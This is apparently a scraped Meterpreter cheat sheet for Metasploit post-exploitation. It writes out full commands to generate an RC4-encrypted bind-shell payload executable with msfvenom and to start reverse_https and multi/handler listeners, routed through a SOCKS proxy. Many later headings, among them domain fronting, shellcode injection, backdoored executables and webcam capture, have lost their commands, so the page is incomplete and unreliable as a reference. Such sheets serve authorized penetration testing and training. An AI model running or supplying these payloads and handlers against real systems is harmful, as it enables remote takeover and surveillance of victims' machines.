Meterpreter
Cheatsheet
Quick handler launch:
msf > handler -H eth0 -P 443 -p windows/x64/meterpreter/reverse_https [-e x64/xor] [-x]Bind RC4 payload & handler through SOCKS proxy:
$ msfvenom -p windows/x64/meterpreter/bind_tcp_rc4 RHOST=10.10.13.37 LPORT=443 RC4PASSWORD='Passw0rd!' -f exe -o rev.exe
msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/bind_tcp_rc4
msf exploit(multi/handler) > set RHOST 192.168.1.11
msf exploit(multi/handler) > set LPORT 443
msf exploit(multi/handler) > set RC4PASSWORD Passw0rd!
msf exploit(multi/handler) > set PROXIES socks5:127.0.0.1:1080
msf exploit(multi/handler) > runGenerate a custom SSL certificate for encrypting C2 communications:
Automation (about exploit flags here):
Start SOCKS server (default is SOCKS5):
Handle connections with domain fronting:
Migrate to a different architecture:
Switch to the next transport killing current session:
Reverse local port 3389 (on Victim, 192.168.1.11) to local port 43389 (on Attacker):
Routing:
Execute binary from memory:
Execute .NET assembly from memory:
Inject shellcode:
Backdoored legit executable with delayed Stdapi loading:
Quicky opsec traffic build template:
Get web camera capture:
Debug
Last updated